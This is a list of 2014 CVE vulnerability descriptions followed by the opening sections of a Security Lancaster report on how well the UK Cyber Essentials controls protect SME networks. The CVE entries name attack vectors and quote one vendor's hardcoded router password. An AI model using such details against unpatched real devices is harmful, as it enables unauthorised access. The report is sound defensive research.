CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster - Page 26 of 28
Survey Responses
Executive Summary

Findings

This report assesses the effectiveness of the Cyber Essentials controls in mitigating cyber-threats.

Two hundred randomly selected, internet-originating vulnerabilities are analysed for mitigation across four SME networks, with and without the Cyber Essentials controls in place. A network built from survey responses is used to assess the typicality of the SME networks, as well as to develop a broader understanding of typical SME network configurations and security practice.
The aggregated results show that without the Cyber Essentials controls none of the attacks assessed were mitigated on any network. This, more than anything else, should be understood by SMEs: taking no action to combat cyber threats simply isn't an option.
With the CE controls, more than 99% of the vulnerabilities applicable to the SMEs interviewed were at least partially mitigated, as shown in the figure below, which depicts the aggregated results across all cases studied. The approximately 13% of exploits only partially mitigated rely on hardware or software vendors releasing patches promptly and effectively to combat the vulnerabilities.
Once the vendor has released a security patch, the Patch Management component of Cyber Essentials ensures that the system returns to a secure state. However, until a patch is released, the vulnerability remains in the network. For this reason, SMEs should frequently consider what services or software are installed, whether they are necessary, and whether a more secure alternative is available.
The few vulnerabilities not mitigated by Cyber Essentials are due to fundamental, hard-coded flaws in hardware or software that cannot be updated or patched to a secure state.
Figure 1: Cyber Essentials Aggregated Vulnerability Mitigation Results
Recommendations
Although the Cyber Essentials controls have been shown to successfully mitigate the vast majority of the attacks assessed, it is important to note that only 'commodity-level' exploits (as defined by the Cyber Essentials Framework [10]) viable for a remote attack have been considered.
The scope of this report does not address vulnerability to insider threats, social engineering, physically proximate attackers or other targeted attacks; a follow-up study with a wider scope is recommended to investigate the risks from other forms of attack with the use of Cyber Essentials.
The '10 Steps to Cyber Security' report published by CESG [2] highlights that, in order to maximise the security of a network, it is essential not only to consider the prevention of attacks with the use of tools, but also to ensure that all employees are adequately educated in network security and subject to scrutiny through access logs and data-loss-prevention schemes, in order to achieve a secure business in the face of potential local and remote attacks. We would recommend that, especially for larger organisations, additional security measures such as these be put in place.
For hardware or software identified as inherently flawed, resulting in unmitigatable vulnerabilities, our recommendation is that these products be avoided at all costs when building an SME network. In addition, a global list of unsafe products could be collectively developed and made publicly available. This relates to our last recommendation: integrating Cyber Essentials further with collective security approaches such as the Cyber-security Information Sharing Partnership (CiSP) [4]. These approaches keep SMEs up to date with the latest information about vulnerabilities and other cyber-threat information.
Introduction

Cyber Essentials was introduced as a government-funded scheme, first published in April 2014 in the interest of national security, to bolster UK security in cyberspace. The Cyber Essentials scheme was developed in collaboration with the Information Assurance for Small and Medium Enterprises (IASME) consortium, the Information Security Forum (ISF) and the British Standards Institution (BSI) as a set of basic technical security controls for organisations to utilise for the mitigation of the 'bottom 80%' of remote cyber-threats [3].
The scheme, built to provide an implementable subset of the 10 Steps to Cyber Security [1], was released as part of the 2011 UK Cyber Security Strategy [16] and is backed by the UK government as an organisational standard. Thus far it has been adopted by several large organisations, including Vodafone, Hewlett-Packard (HP), BAE Systems, Virgin Media and Barclays [5].
Cyber Essentials accreditation has been mandatory since 1 October 2014 for all suppliers of government contracts involving "the handling of sensitive and personal information and provision of certain technical products and services" [17].
The Cyber Essentials security controls are summarised as follows [7]:

• Firewalls and gateways: devices designed to prevent unauthorised access to or from private networks; good setup of these devices, in either hardware or software form, is important for them to be fully effective.

• Secure configuration: ensuring that systems are configured in the most secure way for the needs of the organisation.

• Access control: ensuring that only those who should have access to systems have access, and at the appropriate level.

• Malware protection: ensuring that virus and malware protection is installed and up to date.

• Patch management: ensuring that the latest supported version of applications is used and that all the necessary patches supplied by the vendor have been applied.
Figure 2: Cyber Essentials Security Tools
The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework [10]. This states that the CE controls are applicable to all sizes of enterprise as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in including 'Bring Your Own Device' network setups in scope, as well as cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as those in manufacturing and retail, are applicable to CE but hold additional vulnerabilities due to their nature that are not considered.
Aims
The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.
A commodity-level attack has been defined by CESG [8] as:

  Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet, and that does not require extensive specialist knowledge to conduct.¹
To effectively assess Cyber Essentials, it is first necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey was conducted to build a broader picture of SME network deployments. The survey results help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of the SMEs interviewed.
The networks modelled from the collected data are considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted by adoption of the CE scheme.
¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.
Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data, through interviews and a survey, regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper models to be analysed.

• Composition of a list of suitable vulnerabilities containing applicable methods by which remote attackers can carry out commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE tools.
Data Collection
In order to analyse the effectiveness of the Cyber Essentials security tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.
Interviews
The interviews were composed with the goal of first understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration, it was important to understand how the network is used: where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches, and how often updates are rolled out.
Survey
